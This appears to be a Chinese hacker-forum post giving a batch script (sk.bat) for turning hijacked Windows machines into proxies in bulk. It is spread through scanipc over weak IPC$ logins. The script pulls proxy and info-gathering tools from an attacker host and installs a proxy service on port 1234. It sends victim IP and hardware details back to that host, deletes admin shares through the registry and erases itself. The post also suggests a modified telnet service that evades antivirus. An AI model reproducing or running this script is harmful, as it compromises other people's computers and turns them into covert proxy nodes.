最近狂制作代理,虽然是上传BAT自动运行,但还是感觉很累,于是想到一个办法可以方便批量制作代理的方法。
工具:scanipc 哈哈 这个可是一个好东西~可以同步植入程序~ 环境:呵呵~当然是我们的肉鸡,难道你自己机器扫?这台肉机上需要有scanipc和sk.exe(代理的server端)
我们在扫肉鸡之前设置选择同步植入程序,这里我们植入一个BAT文件 sk.bat scanipc下载:http://ww2.heibai.net/download/show.php?id=3290
=============sk.bat======================= @echo off @rem 参数设置,可以自己修改,D-HYH 的修改版 @setlocal @set zip=218.1.1.1 @set zuser=administrator @set zpass=nopass @set tftpip=218.2.2.2
net use \\%zip%\ipc$ "%zpass%" /user:"%zuser%" copy \\%zip%\admin$\system32\sk.exe %windir%\system32\. copy \\%zip%\admin$\system32\winegg.exe %windir%\system32\. copy \\%zip%\admin$\system32\pi.exe %windir%\system32\. rem tftp.exe -i %tftpip% get pi.exe if not exsit sk.exe goto :end sk.exe -install sk.exe -config port 1234 net start skserver pi.exe >a ipconfig.exe |find /i "IP Address" >> \\%zip%\admin$\system32\skinstalled.txt @findstr /i /c:"Processor speed:" a >> \\%zip%\admin$\system32\skinstalled.txt @findstr /i /c:"Physical memory:" a >> \\%zip%\admin$\system32\skinstalled.txt @findstr /i /c:"Processors:" a >> \\%zip%\admin$\system32\skinstalled.txt @echo Windows Registry Editor Version 5.00 >%windir%\system32\tlnt.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>%windir%\system32\tlnt.dll @echo "AutoShareServer"=dword:00000000 >>%windir%\system32\tlnt.dll @echo "AutoShareWks"=dword:00000000 >>%windir%\system32\tlnt.dll @%windir%\regedit.exe -s %windir%\system32\tlnt.dll net share ipc$ /del net share admin$ /del del tlnt.dll /f del a /f :end @endlocal del sk.bat ======================================= 可能存在的问题,
1. 如果主机作了nat。我经常连接到内网的192.168.0.4之类的。上面。这样ipconfig就没有办法了。 2. 最好加上主机硬件信息,cpu主频,个数,内存数目。psinfo.exe 3. 最好是打开tlntsvr服务。当然是修改了tlntsvr.exe之后,没有提示信息!这样保证不被杀毒软件发现。 4. 最好删除admin$,ipc$,c$......并且修改注册表防止reboot后出现!
|
|